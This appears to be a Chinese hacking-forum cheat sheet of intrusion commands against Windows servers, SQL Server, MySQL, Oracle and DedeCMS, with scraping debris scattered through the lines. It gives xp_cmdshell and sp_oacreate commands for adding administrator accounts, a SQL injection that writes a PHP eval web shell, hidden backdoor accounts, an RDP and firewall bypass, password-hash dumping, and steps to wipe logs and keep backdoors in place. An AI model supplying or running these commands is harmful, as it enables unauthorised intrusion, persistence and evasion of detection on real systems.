6 f1 b+ K% h! G* L
1.net user administrator /passwordreq:no
- t% O. C) l' L, i这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
" A6 P5 w; p! b# t* f- y2.比较巧妙的建克隆号的步骤* ?/ ?3 e5 v# j! T7 I0 |
先建一个user的用户
/ g. v; ]6 r7 k) E- E然后导出注册表。然后在计算机管理里删掉0 R) ]9 T. i, l4 R- `
在导入,在添加为管理员组: W/ y# {; o2 @$ t- W
3.查radmin密码8 F" t+ N$ @( A3 q* r/ m
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg O' l+ j6 R0 h4 W K& Q" `6 ]
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]8 c, P6 E2 W0 m8 b3 n! M
建立一个"services.exe"的项# n3 h+ |, C4 E
再在其下面建立(字符串值)
% [; B3 i3 r& [6 A2 ?+ V' I3 A键值为mu ma的全路径9 y, [ [2 n/ s e
5.runas /user:guest cmd4 {" B3 M: R+ r
测试用户权限!
6 l, o6 Z/ B0 R% i5 Q( d( V& e6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
3 ?: K! n" ?3 o9 V4 {! D' L* E7.入侵后漏洞修补、痕迹清理,后门置放:3 _$ c9 M/ @. o5 }8 m- |
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门' G" X1 T. u+ \3 }4 B- k4 R3 r
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c; K5 d0 N- f3 s
' U3 L9 T# H4 a# B3 j& c* x
for example
$ M+ N/ z. {( O( B, {
# \/ ^. l- P4 _& V6 e6 Y6 Odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
, e8 z& U+ f5 @7 I) g- k" R: @! I* A3 U6 R
2 }( J& X4 [. ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
. U T/ g, B7 W% c- B+ n2 y3 W6 c0 `# b
+ ]+ S3 d6 Z& ?9:MSSQL SERVER 2005默认把xpcmdshell 给ON了- F% n) `6 {: k" j/ W* S
如果要启用的话就必须把他加到高级用户模式9 [9 `/ G9 H: \+ s4 ]. h
可以直接在注入点那里直接注入: Y$ G+ _' g3 P' ` T7 |- p
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
0 u( h: c( \ [然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--$ {" e2 A1 x, T
或者- u' b, _% ]1 J9 U, Z
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
% `5 U6 @+ I4 u+ a+ J来恢复cmdshell。
+ Y0 i" M. z, D8 e+ i. Q) U) ]) R4 P s* I& {9 T2 x9 W" \( Z
分析器
, Q! O; k" h; Z, x* S$ ^( h7 QEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
* K$ Y$ ~& Z* p- [( p+ {: q/ r/ c然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
" R2 ~: p; g8 e' H( J10.xp_cmdshell新的恢复办法2 ^/ d6 c6 H) b
xp_cmdshell新的恢复办法9 `# _3 M0 ?" s: I
扩展储存过程被删除以后可以有很简单的办法恢复:
* ]# V0 A! z# D; |# _6 w$ @" U删除
) ~4 j* [' S* |# B+ @3 cdrop procedure sp_addextendedproc
# F7 M3 B% H1 g( A% p$ Kdrop procedure sp_oacreate
) U0 q+ u, q7 \% i, P" cexec sp_dropextendedproc 'xp_cmdshell'# O" v+ D: {- h& c: X" E. ?
. J7 X0 \# s$ y& M7 O6 T& N恢复! y& t. c/ I1 B/ w! ^' f9 k
dbcc addextendedproc ("sp_oacreate","odsole70.dll"), A' x$ F, F6 S8 d
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")2 p) a% Y5 o0 z) p5 N U
) Y* x8 n9 k6 H这样可以直接恢复,不用去管sp_addextendedproc是不是存在
8 i. ]4 {; U& T5 z, u. h7 h" H0 A7 c5 T" L% h5 a
----------------------------- ]- k' k& [. [' j; l9 J
1 b# x+ y1 J3 }1 }, _! _7 u7 `& {8 o
删除扩展存储过过程xp_cmdshell的语句:
/ p5 U* G8 f" \. [* t9 eexec sp_dropextendedproc 'xp_cmdshell'. g' j; x+ o$ Y2 ~ Z
" x8 o9 W- a) m& t$ X: a恢复cmdshell的sql语句
# r+ U+ u0 G! w1 W1 `exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'9 C* z9 P0 D+ H5 ]0 m: W
# |: J" `! {. C
% l0 ]. K/ U8 b6 X% W开启cmdshell的sql语句) K9 d5 r9 n/ e' z5 J* ?/ ^
/ ~. s! v& ~2 E; {' ^exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'5 c; T& ]" t9 q0 _. m
' z; u! \/ x2 m- Q, J
判断存储扩展是否存在
$ c- l; n/ o/ X) p# Tselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'! v" |5 L4 h2 \2 P$ d
返回结果为1就ok
6 O- {/ f8 s7 v! ^+ B. D9 \6 ~9 _: V% o
恢复xp_cmdshell% G7 T8 l! Q* p( B0 T
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
f2 `1 {: I. B i6 l& y返回结果为1就ok( N$ y' @7 D5 J2 y+ y
' H4 b0 F2 k+ |7 u* f
否则上传xplog7.0.dll
' M3 f' m0 h6 ^9 w( z* {exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
, n e+ D9 I# [# s$ Y1 T, ?+ A# u4 Y. w/ }) F
堵上cmdshell的sql语句7 n; v5 r0 ]7 u1 \
sp_dropextendedproc "xp_cmdshel9 ~" ~9 a: o2 w) K9 |
-------------------------5 R" d0 Y; a; d3 g* ?% l
清除3389的登录记录用一条系统自带的命令:4 o. M8 \3 Y7 W
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f2 O$ ^. L7 S/ P0 |: g7 k- |; O% V
' U+ @) }9 k$ Z
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
5 _3 c5 F9 p. s+ w1 q9 s: G在 mysql里查看当前用户的权限& k6 ?2 x8 Y2 A. d- c5 C' ~
show grants for & `9 }8 x( u% M# |. L+ p. t d$ r; A" A
3 e" r( @+ ?4 h; b+ C- R8 Z% X! {. g
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。& R" t8 |! I$ p! ?, A
. J' A. H K3 D9 N# z E" s: ]! N% u; C; u3 P7 q1 l; U: T
Create USER 'itpro'@'%' IDENTIFIED BY '123';+ y1 I, c0 T6 Q5 H5 l. R
9 S6 B1 y1 Z1 W+ w$ X& ]" f: m* G0 f1 s
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
. v' u- c; D- `/ S
# |2 G8 f2 a1 r5 N7 l r3 d9 pMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
n/ l9 e9 N" _% d) H# ~: E4 }
) J4 h4 I3 s4 G( m7 xMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;7 b9 ]4 f$ o$ P- u' g! z; x
" I, r" I- ~, C; q$ w8 ]
搞完事记得删除脚印哟。
" }6 L% ~; [/ @- D' @
1 R6 F3 O% r. U9 ~( H8 b' zDrop USER 'itpro'@'%';
- s0 X" H. `8 @# O9 e' q9 b) d7 a8 d: E* v7 T/ c4 Z* D
Drop DATABASE IF EXISTS `itpro` ;/ _6 r7 M# F8 z _- r& g, V- c
, d9 T' A" }" P2 X z/ A当前用户获取system权限5 \! V. y0 w3 X7 O6 i3 c
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
5 D$ _4 r5 ^3 Hsc start SuperCMD
6 B2 b; F, Y2 d0 |+ y: U+ ^! B8 g程序代码% X4 X4 a, i+ o/ `, c
<SCRIPT LANGUAGE="VBScript">& A+ a: m0 _1 L$ ~# C, T2 n
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
1 a# w/ r+ Q1 E, W9 y% Bos="WinNT://"&wsnetwork.ComputerName
- w: @5 }5 Z! e; W9 c% zSet ob=GetObject(os)
; b+ g. R& Y. u1 SSet oe=GetObject(os&"/Administrators,group")% ], _9 ]3 ^. Q+ _+ |
Set od=ob.Create("user","nosec"), G, c5 l) N# o$ d9 S) ^
od.SetPassword "123456abc!@#"3 A4 _" Y# k( m% f& F$ S8 f
od.SetInfo
8 @! R4 J* A# A6 S7 ^& dSet of=GetObject(os&"/nosec",user)+ g' `2 a4 n3 Y
oe.add os&"/nosec" O% X* f, N; R0 X) Q
</Script>
1 |0 G6 ^, g/ S3 I<script language=javascript>window.close();</script>- m+ F, E! r1 A9 @ ? q4 r
5 f! z, }' o! p
3 w6 i+ E/ F' K0 B/ `+ z
' R0 n' u+ T X5 C9 d* C
% c1 W4 V, t$ E5 @突破验证码限制入后台拿shell( _7 V* [; l7 w2 u; P w& |* S) j3 v
程序代码8 P) H5 `/ w0 s: B& R7 u/ l
REGEDIT4
& \8 Y4 t: _) Q1 Q[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] r4 Y! g5 I* A) B* ]2 j; k8 A" ^) @
"BlockXBM"=dword:00000000. O& E f$ l. ^9 D
8 U# u, ^+ m6 z
保存为code.reg,导入注册表,重器IE
$ w% v3 z, u1 g! G, T @. S就可以了/ u, Y3 x5 M% ~- n r: T
union写马
4 p$ j9 W0 R3 ]' G程序代码& I- q( p9 m G: T
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*, N2 G0 l( V. j3 h9 F+ m
2 `0 x4 A0 {/ c! t8 U! F: E
应用在dedecms注射漏洞上,无后台写马 x5 o: c# `* C+ S- @1 g2 `
dedecms后台,无文件管理器,没有outfile权限的时候& D. n: I, T: D7 v+ b
在插件管理-病毒扫描里
: j. o' v( z+ G* b! s x6 h写一句话进include/config_hand.php里
' K" O) v5 w+ f# n7 d程序代码) q5 z$ u' B$ E4 p: q' b
>';?><?php @eval($_POST[cmd]);?>
0 l! l0 `7 x) E; n& T
: U9 c: \" m/ R4 b- L; B, ^" i1 _* s0 x/ M+ i& s4 O
如上格式
$ e3 g* p, }9 t$ `# X+ I
' z7 `+ m& ]* m3 `3 j/ P" Yoracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解+ @& ~) R* G% f$ ]- h) ~$ e: c
程序代码
v N6 h. B) o) Y7 i3 a5 F5 {select username,password from dba_users;* P# d; x3 e3 {0 i) \) b( C
4 f/ h) ~$ H% E% I v- w$ }+ {: a' y
mysql远程连接用户
9 d7 w' M" O; V" u, q' B2 N' i2 f2 r程序代码$ ?; M# C) q1 @2 l+ ` _" ?( c5 Z7 T
9 |7 U3 T2 z) ]. f/ M( `
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';. R& y6 D9 O L7 U8 T/ L
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION* F$ ~# X2 v) l3 m* ?
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
# O) n$ N+ q+ ?MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;% D; Y5 R: u2 U6 X- ^
/ c; \0 i( ~) p
4 X1 a/ f @ d: j* s! _
8 }3 ?1 D& `+ _% N0 V9 p6 [" g% c3 I2 H
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
* p1 q2 V$ j! t/ n
1 t7 ?; h& C5 ^ ~( b0 N1.查询终端端口
0 _3 \# m2 q; O Y3 k8 [7 l5 L5 @
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
& |& N' Q0 [: l/ y9 x: w' e
9 @* D B+ ?# [$ V/ q通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"- z' }5 r1 x0 i
type tsp.reg
8 U7 E0 O" s/ Y7 X: @, |5 D* f- K$ R! B9 y5 N h
2.开启XP&2003终端服务
: O% u/ g: @' p! v2 K% `2 \" i! v! u$ {2 ^2 p
9 t3 B- E* |' E) Z" DREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
& l2 `+ X; P$ p
o. M& b% l, A$ @$ [( Y1 G( T
" S8 G% N+ q r- r% jREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f1 `6 S: @- B) s6 J7 E* K: i+ K
F- ]0 G; W" l) `3.更改终端端口为20008(0x4E28)
% j7 i: s+ \. y# q. a0 C
. A; A+ F7 h3 R9 @' i' d- aREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
; b# T3 a4 V) t+ J) a
! {; n( f% Z9 W) X$ G# @; CREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
% f4 ?. z( Z# u. d; `4 e; h# O2 X' N2 }$ P
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
2 ^3 N: I% z. \4 N/ L" h4 O/ w; F- L5 N, K z
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
$ L! ?, ^% K3 M- @, e" G
5 e' q/ t- ?! k% g" J/ w& q4 E; q/ a/ g1 C, w
5.开启Win2000的终端,端口为3389(需重启)
8 \& o. x# {1 E. O) o) E3 f# H8 ~) g: W2 }: P: o
echo Windows Registry Editor Version 5.00 >2000.reg * [9 N7 Z, V" z$ r3 P
echo. >>2000.reg
+ Q0 _4 C8 L! |- V* decho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
3 o# |$ O E7 s2 b, @+ _echo "Enabled"="0" >>2000.reg
# C' E" Z7 l/ U' O D7 {7 Qecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg " n/ A- T, P4 N- g: I! b
echo "ShutdownWithoutLogon"="0" >>2000.reg
: m" p9 i- G* I/ Becho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
, r4 W1 ]( Z+ yecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg 1 C' f" n, `$ ?1 o ~% _0 l% |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
5 s" E# x8 v. `echo "TSEnabled"=dword:00000001 >>2000.reg
' `, z/ q W: J7 k) Hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 5 s% M, Y, O! g
echo "Start"=dword:00000002 >>2000.reg
) ?4 Q5 m) ]# F- X- x: G( necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 4 c' C4 G6 Q7 O3 I$ u1 {& g9 e( w
echo "Start"=dword:00000002 >>2000.reg 0 W" O8 F' v8 J
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg # z! `. }/ |1 r, J
echo "Hotkey"="1" >>2000.reg 4 B, l( V6 {7 u P3 j! m8 j" E% U
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg ; s8 K" {* V+ K% w" y8 W- f# @
echo "ortNumber"=dword:00000D3D >>2000.reg ( L# n( j" a; b. D, s5 b. Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
! N8 M% p% l5 q; R2 }7 w8 e& @echo "ortNumber"=dword:00000D3D >>2000.reg
6 _6 J* @1 ?% f9 N) R, i/ G+ E0 b/ Q1 |) a( A/ l
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启); T5 y# o. ~: q, j/ L/ _2 H
* a5 O4 u/ Z7 O8 K8 \@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
- `. `6 a6 ^& E! z+ n9 P(set inf=InstallHinfSection DefaultInstall)
2 f& S/ N ?; q6 ^: Q% D ]echo signature=$chicago$ >> restart.inf
5 \/ o( t: \( ^# I( h) Vecho [defaultinstall] >> restart.inf
! T# a3 `1 |/ e) E2 f. x' @rundll32 setupapi,%inf% 1 %temp%\restart.inf
* U% b; H1 k# K8 [8 c
7 T& ^& R w# F* X! a3 `0 H1 S. s3 c$ n( A: }9 k
7.禁用TCP/IP端口筛选 (需重启)- \' y# u" r: P0 `2 _) m8 D
& z5 `$ m$ e% B
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
v1 a, {( g0 P* ?" a" g O$ [
) l1 @ Z( a; h# ?" y5 T2 ]! [8.终端超出最大连接数时可用下面的命令来连接8 c6 ?, p( g& C4 H- F5 A# H1 v
/ b" Q% o5 y$ R5 R+ Mmstsc /v:ip:3389 /console
* i! I3 f% T$ N: J0 G9 [8 T$ u3 g8 V. n) V$ n* t/ D
9.调整NTFS分区权限6 K" B; G8 y ?% r3 ?# b; Y
, i4 G# q/ }1 B- j7 _cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
* v& T4 e! `! m. p* H! o
% D, q9 f0 c* E; P( {) v0 V7 Ucacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)9 n" O7 o. e: ]- h# |
( ]3 B, Z& V7 |) R5 T3 O" v9 P; h
------------------------------------------------------
0 @; C5 U' T6 O# Y0 H% W$ p3389.vbs
% p5 t0 g6 C; `6 n# X4 j- z; pOn Error Resume Next
[" C! a9 @1 x3 i5 G" Mconst HKEY_LOCAL_MACHINE = &H80000002% P, e2 X4 d8 `1 t: M5 s
strComputer = "."
! @' ^/ c& D2 z2 v: ASet StdOut = WScript.StdOut
. k' @7 G' X' \" G- Q; f6 m2 f& vSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_. |2 l2 _- ?: r {+ F
strComputer & "\root\default:StdRegProv")6 {/ h& T( ]# v; e" I
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
- g" v3 A% P! ~& r; M3 i) C7 xoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath* A; t6 J" @& B8 z) [
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"" Y" T- @7 G# o# z; ` U* c! M. a
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
" \. b" X! p# U' d" ]strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
9 n& |: X6 s2 B) [; _- g1 r) XstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
% `% R, H, d: I( M* Z' }) E# TstrValueName = "fDenyTSConnections" y3 N' X( L/ L7 j' O; ` b
dwValue = 0! a8 _: S( U+ P$ S3 X" B% m
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
0 J" [! Y6 L5 s6 C) t7 LstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
8 C; A" Q# R7 }1 V) _strValueName = "ortNumber"
7 U, @, Y0 C' e/ C- N+ pdwValue = 3389
N8 D- k2 \, Woreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue1 j! t: ~' w* l4 J. A
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"' @3 P9 f! X6 N4 @# s
strValueName = "ortNumber". U9 i9 U, }6 f; r! P6 X( c
dwValue = 33898 W! l4 c7 R; D( Y N
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue) i" R: p' k5 E0 a, W5 M, a
Set R = CreateObject("WScript.Shell") ]) W/ u2 b: u3 A: \0 `
R.run("Shutdown.exe -f -r -t 0") * K& N$ e8 ^2 T. A0 V) j
( S- T! z& |5 V/ t7 w% r5 J
删除awgina.dll的注册表键值
+ x. w* z9 z! ]8 n4 M程序代码
+ e" W# z+ |9 A x& |2 C
% ]) H9 u/ ^. f$ N8 V; Z- F$ V) S2 |reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f5 N1 M- H! a+ I6 `3 O5 J" ~
X2 c9 F- [0 V2 L( W$ `) t8 o( Z
4 Y! ?+ _8 N4 o+ e
" f2 ~/ p b5 c; g6 Z( |1 ?1 L
" n/ g! J5 ~7 K5 y
程序代码% K4 b% e; O3 {2 @& L! e2 x
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
- G6 E, I! H& f) F8 ^ x, s
- O0 m1 U1 y$ H% w3 W, o: ]; D设置为1,关闭LM Hash
; I# K+ K& N& k7 ]1 \8 T2 L, n2 W' P. N* L
数据库安全:入侵Oracle数据库常用操作命令
, S. K) S2 ~+ p$ m4 t3 @- d+ `最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。" \$ O3 j( B9 V" Z# p w- _5 V
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。. z9 t$ }6 U8 N1 u
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
9 u+ }* }6 o1 [0 q$ h: ]$ U5 `3、SQL>connect / as sysdba ;(as sysoper)或" H7 M( T( @' ]% i- R: R5 i7 E$ h
connect internal/oracle AS SYSDBA ;(scott/tiger)! ], x8 A6 ?6 G2 ~$ R5 ]) ^. S
conn sys/change_on_install as sysdba;( C3 J, |$ o) m% G) z- i& ~1 U
4、SQL>startup; 启动数据库实例3 {8 t1 H6 a; J% p* V B
5、查看当前的所有数据库: select * from v$database;( A% s) t7 w5 A$ \
select name from v$database;8 ^4 A8 g: q% P. G" ~5 W
6、desc v$databases; 查看数据库结构字段6 W' f: g6 E1 B
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
1 J+ ]+ { ]* m1 y8 N9 O7 LSQL>select * from V_$PWFILE_USERS;
9 g, H; } J7 v* Y- FShow user;查看当前数据库连接用户, P+ m( H( i! |$ G. X( ]5 `6 P
8、进入test数据库:database test;% q9 M- V2 V4 {- j9 c2 G8 f3 }! e
9、查看所有的数据库实例:select * from v$instance;2 h6 N- C( n% m7 d$ |4 h. \
如:ora9i
! |9 n: \8 @3 { F- H10、查看当前库的所有数据表:
7 Q, p! H5 z. _3 fSQL> select TABLE_NAME from all_tables;* q$ [* w- t7 m: Z& A" ^3 p/ [, Y! H
select * from all_tables;
& |+ a7 ?- H/ YSQL> select table_name from all_tables where table_name like '%u%';- d2 }+ T$ F+ C* @0 V ~+ a
TABLE_NAME
& d3 x7 n0 q4 h: x------------------------------
6 t& x1 }) j& f) g% D_default_auditing_options_
9 X* e J& q2 r u4 b4 B( I11、查看表结构:desc all_tables;
: r) F7 V3 z; X. J! I0 q12、显示CQI.T_BBS_XUSER的所有字段结构:
. i( |, c& U0 A# Q, P p2 Zdesc CQI.T_BBS_XUSER;9 |* q, X: h" j7 Z
13、获得CQI.T_BBS_XUSER表中的记录:
: J$ f- w+ y( y, Q8 Gselect * from CQI.T_BBS_XUSER;
) U, p; v, n' K! R: v14、增加数据库用户:(test11/test)- Y1 X) X$ N: ?! b; }
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;4 w( G& R8 \! p/ k
15、用户授权:
: D6 _" o$ S+ `" [& a Y) h( M* Zgrant connect,resource,dba to test11;* w4 E( z8 g2 x9 y1 Q- G$ w$ }
grant sysdba to test11;& `7 @7 h1 B+ H7 J/ W
commit;$ N+ z! t1 q! i6 k- W
16、更改数据库用户的密码:(将sys与system的密码改为test.)
- f1 X0 L+ ^, L4 _4 R' f& Galter user sys indentified by test;2 V! a2 G0 I2 y- V; t/ u! m) j
alter user system indentified by test;
6 B' n u2 q0 x6 [7 e
2 k3 X' E! F9 q! L. happlicationContext-util.xml
m- Z7 Q' y( w$ m; Q/ ?6 TapplicationContext.xml" i6 h: J; y- l- x, h' L" {
struts-config.xml
+ [+ `' v( P T& Y D @- B: mweb.xml9 V$ {! {9 D. l7 ?( U) L
server.xml
+ I; W, T( w+ }! R4 vtomcat-users.xml
. W7 a9 R- y* S+ v, R" E9 X p* r+ h* Ahibernate.cfg.xml1 c E7 W1 x- ^' e: _+ k" {( o# `
database_pool_config.xml
1 Z- a! G5 z$ u1 L1 j; S# H
1 d8 N) { ^/ C s$ c4 K
2 g+ O4 [- H3 E1 A( e\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置/ A' _) T( _) y! y, f: j5 |+ D+ f
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini9 H8 K- H& H+ ?6 V9 G
\WEB-INF\struts-config.xml 文件目录结构
6 R1 w4 s% A% z7 @' [ _1 z! L6 c% m I5 L4 F! x- Q5 h) S N
spring.properties 里边包含hibernate.cfg.xml的名称5 R* ^' j2 P8 O! D( c, z
6 w! l- U* F; p1 T
4 Q0 u+ T% A# E/ \
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml- T7 }& @0 Q2 u1 y: d1 g( [ r
. ~/ c9 ^) w$ i [* r9 S* A% }
如果都找不到 那就看看class文件吧。。$ N: S! D# P% y
; T8 V; F# h; n+ g w+ M o V, b
测试1:
* y- L/ D* Z; s8 M2 d' ]: J8 _SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
: [% [% d8 g, {6 [' f# `; Y' |( ~
测试2:
t' P& t+ n# g6 j. R* }1 t7 D7 W) L' \$ h e* v
create table dirs(paths varchar(100),paths1 varchar(100), id int)1 ]% ^4 q- e) d+ v6 K1 k8 |. f7 ~
) U$ a8 {7 p+ z& Y8 Q( {delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--# |" m/ q4 |: D$ \+ B9 p
4 ^1 A! G5 `. z- Q1 [! u4 a0 e: iSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
+ w. R- m( A: q$ }3 L0 M9 l) b6 T' v% l5 A9 i3 D
查看虚拟机中的共享文件:! u" B. N7 R5 V5 V( q4 j
在虚拟机中的cmd中执行
& `& c: @6 k- n) [\\.host\Shared Folders
& S' c& g8 ?. i+ ?- k: h8 O; N% a4 n% S0 l9 Z9 Z7 h5 S
cmdshell下找终端的技巧
6 F: `# G' R" [/ `2 C9 R; t找终端: : n: @( Z/ D. S! h1 Q2 _3 V
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
" o2 w. X9 \9 [0 b/ Y 而终端所对应的服务名为:TermService
% @) U# }9 x- Y8 l第二步:用netstat -ano命令,列出所有端口对应的PID值! ; C* {, j* M- ] {; B: F* D9 b
找到PID值所对应的端口
) P: a7 q& m- p0 d h' s8 n: p
! X% n( g2 h2 J& O7 S# \查询sql server 2005中的密码hash7 W! J( L) @& v
SELECT password_hash FROM sys.sql_logins where name='sa'( h1 _7 }% e& u1 B" {( \, Y
